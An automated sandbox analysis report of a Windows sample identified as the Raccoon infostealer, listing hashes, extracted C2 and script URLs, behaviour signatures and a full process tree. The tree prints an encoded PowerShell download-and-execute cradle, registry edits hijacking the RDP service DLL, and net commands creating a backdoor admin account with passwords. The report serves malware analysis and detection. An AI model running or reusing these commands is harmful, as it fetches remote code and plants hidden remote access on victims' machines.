Analysis
-
max time kernel
88s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
02-06-2021 18:08
General
-
Target
f13060a6789449453b7d4a4b815cc80d.exe
-
Size
567KB
-
MD5
f13060a6789449453b7d4a4b815cc80d
-
SHA1
77d3b0a202710d93c660aca624a63a97811b8f9e
-
SHA256
2b9b67b6e376ed8db68a8b219209981c865a2a26a4c4cd926b79cf2fddb57d54
-
SHA512
78ed128be390ff896fb83b4cac8b30db20258f985d8f86d61f64da19cbd0bd8e2891a46fbdee1ad09e6d99fda697dfb12650deb1c628979b3a4133c438313b55
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
e46634757936706c1ff491585768dd6fe231db30
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 3 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe"C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4339.tmp" "c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kYvjN912 /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc kYvjN912 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kYvjN912 /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kYvjN9121⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc kYvjN9122⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kYvjN9123⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
4d0cb7fa714bb6b8b113319c5f37734d
SHA178fb1052d8fa35592e0f6103378658478c8d1385
SHA256469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845
SHA512b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c
-
C:\Users\Admin\AppData\Local\Temp\RES4339.tmpMD5
50b20b99b5a4a7aadfd05349dab0f94f
SHA1b97b15b279f63766b9158caaca1a66e476793c2b
SHA25640344e2f1ed1104917e5e9d96b33e33e6cd67245a399ff43dc5947ccd38f65c4
SHA512de6fb7ba2c8b40f20217c6889ce9785491ae0b2506967c653bf8898e9bc3d272e8a0d399d330e13ba65a939a13b4b0edd15e9e98e4566b297e19a76da0883d84
-
C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.dllMD5
df58066035d24e61dbb826ddb3470a96
SHA13ab15ccac9182d9ed8c0b305203d6502ca8993b5
SHA256180ac07089abb4e253efe49e437667b58b5e2ca8af41c6b3ae1751f97aa0de53
SHA51210f6a13ea1109f4e41fe58597f2c8fcd547ce03878d3a3297a9a04ad6d03144e2c5893e4f774303ae5f95fa196bb20cd1cad9ff0df99c7471924b4dd8a4ee736
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMPMD5
62374593a8c844fe79522ea67f88c21e
SHA13cc6b749a918c0f3f22f0d97940b75e9f3ef73b0
SHA2566471176eb4782137b2d2b397c19db2888a7d1dfd65e2976388c3739b88c9aebf
SHA51236f9db7a333765b648f43f037ed9d064ce00ec04a464831ef105c870196645b32bccd113644eb2b91f2302955ec511c39b3e87ebd7d920b9f51db69d4f3b7fa6
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdlineMD5
e9e262d6d0b29d1dd029f21bc91c2b81
SHA1ba9ceab757c045cf6243fdbbc8fa922028b1ab45
SHA256005397270f3027adb53af04a607fe653e97f930138b1cc3b6fc306be64b5921b
SHA512c1cfb82ec8b5e404db14d51a2c690b4eddb859e949add6edec5fe77c1ac056a721de6b750cbe40447231b0cb68ad2c7303dd27cce313b28d59cb1240162730c8
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
ee8186ae8d2615ee4a859007556227ec
SHA10125a0caaf2ff3da1266f1893cf051ddca6460fa
SHA25696de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f
SHA5122eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612
-
\Windows\Branding\mediasvc.pngMD5
7a8bf878d6438e28822cb499cb7da107
SHA136cbc7c1b2da094b773614d251704e4c2bb0e88e
SHA2569aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63
SHA5126c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee
-
memory/184-239-0x0000000000000000-mapping.dmp
-
memory/912-245-0x0000000000000000-mapping.dmp
-
memory/1084-234-0x0000000000000000-mapping.dmp
-
memory/1328-229-0x0000000000000000-mapping.dmp
-
memory/1428-243-0x0000000000000000-mapping.dmp
-
memory/1512-227-0x0000000000000000-mapping.dmp
-
memory/1564-223-0x0000000000000000-mapping.dmp
-
memory/1596-149-0x0000000000000000-mapping.dmp
-
memory/1632-222-0x0000000000000000-mapping.dmp
-
memory/1644-233-0x0000000000000000-mapping.dmp
-
memory/1656-244-0x0000000000000000-mapping.dmp
-
memory/2128-124-0x00000214FF960000-0x00000214FF962000-memory.dmpFilesize
8KB
-
memory/2128-127-0x00000214FF966000-0x00000214FF967000-memory.dmpFilesize
4KB
-
memory/2128-126-0x00000214FF965000-0x00000214FF966000-memory.dmpFilesize
4KB
-
memory/2128-125-0x00000214FF963000-0x00000214FF965000-memory.dmpFilesize
8KB
-
memory/2128-122-0x0000021499400000-0x0000021499821000-memory.dmpFilesize
4.1MB
-
memory/2128-117-0x0000000000000000-mapping.dmp
-
memory/2168-128-0x0000000000000000-mapping.dmp
-
memory/2168-160-0x0000027FAF1C0000-0x0000027FAF1C1000-memory.dmpFilesize
4KB
-
memory/2168-133-0x0000027F96350000-0x0000027F96351000-memory.dmpFilesize
4KB
-
memory/2168-136-0x0000027FAEA00000-0x0000027FAEA01000-memory.dmpFilesize
4KB
-
memory/2168-143-0x0000027FAE7F0000-0x0000027FAE7F2000-memory.dmpFilesize
8KB
-
memory/2168-161-0x0000027FAF550000-0x0000027FAF551000-memory.dmpFilesize
4KB
-
memory/2168-144-0x0000027FAE7F3000-0x0000027FAE7F5000-memory.dmpFilesize
8KB
-
memory/2168-216-0x0000027FAE7F8000-0x0000027FAE7F9000-memory.dmpFilesize
4KB
-
memory/2168-145-0x0000027FAE7F6000-0x0000027FAE7F8000-memory.dmpFilesize
8KB
-
memory/2168-153-0x0000027F963A0000-0x0000027F963A1000-memory.dmpFilesize
4KB
-
memory/2188-241-0x0000000000000000-mapping.dmp
-
memory/2388-225-0x0000000000000000-mapping.dmp
-
memory/2416-206-0x000001789B0D8000-0x000001789B0DA000-memory.dmpFilesize
8KB
-
memory/2416-205-0x000001789B0D6000-0x000001789B0D8000-memory.dmpFilesize
8KB
-
memory/2416-177-0x000001789B0D0000-0x000001789B0D2000-memory.dmpFilesize
8KB
-
memory/2416-178-0x000001789B0D3000-0x000001789B0D5000-memory.dmpFilesize
8KB
-
memory/2416-168-0x0000000000000000-mapping.dmp
-
memory/2932-217-0x0000000000000000-mapping.dmp
-
memory/2984-209-0x00000215370C0000-0x00000215370C2000-memory.dmpFilesize
8KB
-
memory/2984-211-0x00000215370C6000-0x00000215370C8000-memory.dmpFilesize
8KB
-
memory/2984-210-0x00000215370C3000-0x00000215370C5000-memory.dmpFilesize
8KB
-
memory/2984-208-0x0000000000000000-mapping.dmp
-
memory/3340-146-0x0000000000000000-mapping.dmp
-
memory/3344-236-0x0000000000000000-mapping.dmp
-
memory/3408-121-0x0000000000000000-mapping.dmp
-
memory/3640-232-0x0000000000000000-mapping.dmp
-
memory/3652-246-0x0000000000000000-mapping.dmp
-
memory/3652-218-0x0000000000000000-mapping.dmp
-
memory/3744-120-0x0000000000000000-mapping.dmp
-
memory/3864-235-0x0000000000000000-mapping.dmp
-
memory/3868-219-0x0000000000000000-mapping.dmp
-
memory/3872-249-0x000001BCEF833000-0x000001BCEF835000-memory.dmpFilesize
8KB
-
memory/3872-251-0x000001BCEF838000-0x000001BCEF839000-memory.dmpFilesize
4KB
-
memory/3872-247-0x0000000000000000-mapping.dmp
-
memory/3872-242-0x0000000000000000-mapping.dmp
-
memory/3872-221-0x0000000000000000-mapping.dmp
-
memory/3872-250-0x000001BCEF836000-0x000001BCEF838000-memory.dmpFilesize
8KB
-
memory/3872-248-0x000001BCEF830000-0x000001BCEF832000-memory.dmpFilesize
8KB
-
memory/3904-220-0x0000000000000000-mapping.dmp
-
memory/3936-213-0x00000272FBB90000-0x00000272FBB92000-memory.dmpFilesize
8KB
-
memory/3936-212-0x0000000000000000-mapping.dmp
-
memory/3936-228-0x0000000000000000-mapping.dmp
-
memory/3936-215-0x00000272FBB96000-0x00000272FBB98000-memory.dmpFilesize
8KB
-
memory/3936-214-0x00000272FBB93000-0x00000272FBB95000-memory.dmpFilesize
8KB
-
memory/3960-240-0x0000000000000000-mapping.dmp
-
memory/3960-237-0x0000000000000000-mapping.dmp
-
memory/3960-224-0x0000000000000000-mapping.dmp
-
memory/4012-226-0x0000000000000000-mapping.dmp
-
memory/4048-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/4048-114-0x0000000002110000-0x00000000021A1000-memory.dmpFilesize
580KB
-
memory/4076-238-0x0000000000000000-mapping.dmp
-
memory/4236-252-0x0000000000000000-mapping.dmp
-
memory/4256-253-0x0000000000000000-mapping.dmp
-
memory/4312-254-0x0000000000000000-mapping.dmp
-
memory/4328-255-0x0000000000000000-mapping.dmp
